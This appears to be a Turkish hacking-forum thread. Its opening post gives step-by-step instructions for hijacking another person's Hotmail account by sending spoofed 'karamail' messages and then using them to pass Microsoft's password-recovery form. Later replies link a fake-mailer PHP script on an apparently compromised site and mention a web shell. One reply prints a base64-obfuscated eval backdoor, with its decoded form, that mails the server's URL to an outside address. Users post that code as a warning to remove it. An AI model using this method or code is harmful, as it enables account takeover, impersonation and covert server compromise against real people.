Hotmail Password Reset / Karamail

SaraL

Gri Adam
Rating - 0%
Selamun aleyküm arkadaşlar.

Seneler önce karamail yöntemi vardı şimdi karamail nedir;

hekırlar SM ile hackliyecekleri kişilere karamail yöntemi usulü ile [email protected] adında mail gönderiyordu yani senin mail adresin ile bana mail gönderiyor o değil de sen göndermiş gibi görüp sana güvenerek gönderdiğin bir dosyayı indirip rahatca bakıyorum.

şimdi işin püf noktası yine aynı karamail yöntemini kullanarak hacklenecek adres; [email protected] kendi hesabım: [email protected]

hacklenecek adrese kendi mailim ile karamail üzerinden mail gönderiyorum 1dk bekleyip sonra hacklemeye calıştığımız adres üzerinden kendimize bir mail gönderiyoruz (gönderilen maillerin konu başlığı ve konu iceriği düzgün birşey olsun ayrıca konu icinde foto vs göndermeyin) şimdi hem o mail üzerinden hemde bizim mailimiz üzerinden mail geldi tabi sadece kendi mailimiz ile yapmıyoruz başkalarının maili üzerinden de gönderiyoruz yine aynı şekilde o kişilere hacklenecek adres üzerinden gönderim yapıyoruz ve bir döngü oluştu :)

esas dikkat etmemiz gereken yer; şimdi hotmail e gidiyoruz şifre sıfırlama bölümüne girerek şifresini sıfırlamak istediğimiz adresi yazarak devam ediyoruz, farklı şifre sıfırlama seceneğini kullanarak ilerliyoruz bizden kurtarıcı e-posta adresi isteyecek oraya şiresini bildiğiniz bir mail yazın devam edin sonrasında kişinin hotmail e kayıt olurkenki aldıgı kullanıcı adı ve soyadı vs gibi bilgileri istiyor bizden, orayıda devam edelim gerekli yerleri doldurun gereksiz yerleri boş bırakarak alt sayfaya inin orada en son nezaman kimden ne maili aldın ve kime ne maili gönderdin diye bir kısım var oraya bizim karamail yoluyla göndermiş olduğumuz mailleri ve o hesap üzerinden göndermiş olduğumuz mailleri yazıyoruz konu başlıgı ve iceriği ile harfi harfine kadar yazalım en son devam diyelim, microsoft incelemesine girecek ve sonuc kurtarıcı e-posta adresine şifre sıfırlama linkini postlayacak.

nicin gönderdi: karamail yöntemi ile hacklenecek mailin gelen kutusunun icinde neler oldugunu gelen ve giden mesajların netür mesajlar oldugunu bildiğimiz icin microsoft onayı verdi ;)

Buda karamail denilen exp den görüntü;
12509717_970093286414999_2587626836917589242_n.jpg

NOT: karamail exp yada program tarzı uygulamasını mec'in arşivinde varsa ondan alabilirsiniz...

Rating - 95.8%
Karamail yani başka deyişle feykmailin burda , ama karamail diyince aklıma hep caramail.co.uk gelir , lycos.co.uk un yan sitesi. eskiden çok vakit geçirirdim orlarda. Herneyse konumuz bu değil :) sene 2004 sitemynet siteleri meşhur ozamanlar ve bu karamail mevzuları bilinen ender hack tekniği olarak kabul ediliyor , bende bir sitemynet siteyi hacklemek için sahibinin @mynet.com uzantılı mailine karamail yolladım adam bana cevap yazdı ve dediki yeter amk ! hergün birsürü karamail yolluyosunuz sitemi hacklemek için , al bu şifrem al senin olsun madem çok hacklemek istyosun. Evet beyler adam bana öfkeden şifresini yolladı bende belkide hayatımdaki ilk hack olayımı böyle gerçekleştirmiştim sonrada kasım kasım kasıldım bir süre gurur mutluluk çocukluk işte.. sneaky:

basit bir karamail scripti , araştırın piyasada çok var.
http://www.hakanatravel.com.tr/urun_resimleri/78103.php?id=feykmail

Rating - 0%
Karamail yani başka deyişle feykmailin burda , ama karamail diyince aklıma hep caramail.co.uk gelir , lycos.co.uk un yan sitesi. eskiden çok vakit geçirirdim orlarda. Herneyse konumuz bu değil :) sene 2004 sitemynet siteleri meşhur ozamanlar ve bu karamail mevzuları bilinen ender hack tekniği olarak kabul ediliyor , bende bir sitemynet siteyi hacklemek için sahibinin @mynet.com uzantılı mailine karamail yolladım adam bana cevap yazdı ve dediki yeter amk ! hergün birsürü karamail yolluyosunuz sitemi hacklemek için , al bu şifrem al senin olsun madem çok hacklemek istyosun. Evet beyler adam bana öfkeden şifresini yolladı bende belkide hayatımdaki ilk hack olayımı böyle gerçekleştirmiştim sonrada kasım kasım kasıldım bir süre gurur mutluluk çocukluk işte.. sneaky:

basit bir karamail scripti , araştırın piyasada çok var.
http://www.hakanatravel.com.tr/urun_resimleri/78103.php?id=feykmail

Anjiyo Shell Bazı Sunucular virus Olarak Algılıyor Galiba Mec Sende Crypt Olanı Varmı ?

Rating - 95.8%
Arkadaşlar mrSmith kodu decode etmiş bende pastebinde denk geldiğim için decode halinde ne var yok bilmiyordum ancak fakemail scriptine bile adamlar backdoor koymuş , backdooru silip öyle kullanmanızı tavsiye ederim. mrSmith in bulduğu backdoorlu kısım aşağıdadır

PHP:
<?php
$to = "[email protected]";
$subject = "New Mailer";
$header = "From: xMailer<[email protected]>";
$message = "UrL : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'] . "?upload=up \r\n";
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;
?>

Rating - 0%
Lap sondakı kodlu alanı temizleyiniz...
Şu hisseini
PHP:
eval(base64_decode('JHRvID0gImJsYW5jaTY5N0BnbWFpbC5jb20iOw0KJHN1YmplY3QgPSAiTmV3IE1haWxlciI7DQokaGVhZGVyID0gIkZyb206IHhNYWlsZXI8c2VydmljZUBhY2NvdW50LmNvbT4iOw0KJG1lc3NhZ2UgPSAiVXJMIDogaHR0cDovLyIuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSAuICI/dXBsb2FkPXVwIFxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWwoJHRvLCAkc3ViamVjdCwgJG1lc3NhZ2UsICRoZWFkZXIpOw0KZWNobyAiIjsNCmV4aXQ7'));

Oda backdoor-dur.Sadece base64 kodlamasi iledir. Onunda decodesi şu kodlardır
PHP:
$to = "[email protected]";
$subject = "New Mailer";
$header = "From: xMailer<[email protected]>";
$message = "UrL : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'] . "?upload=up \r\n";
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;

Rating - 0%
bu mailleri kim inceliyor bir bot mu inceliyor hemen arkasından dönüş yapıyor çünkü.

131,450Konular
3,268,269Mesajlar
315,163Kullanıcılar
Hybris010122Son Üye
Üst Alt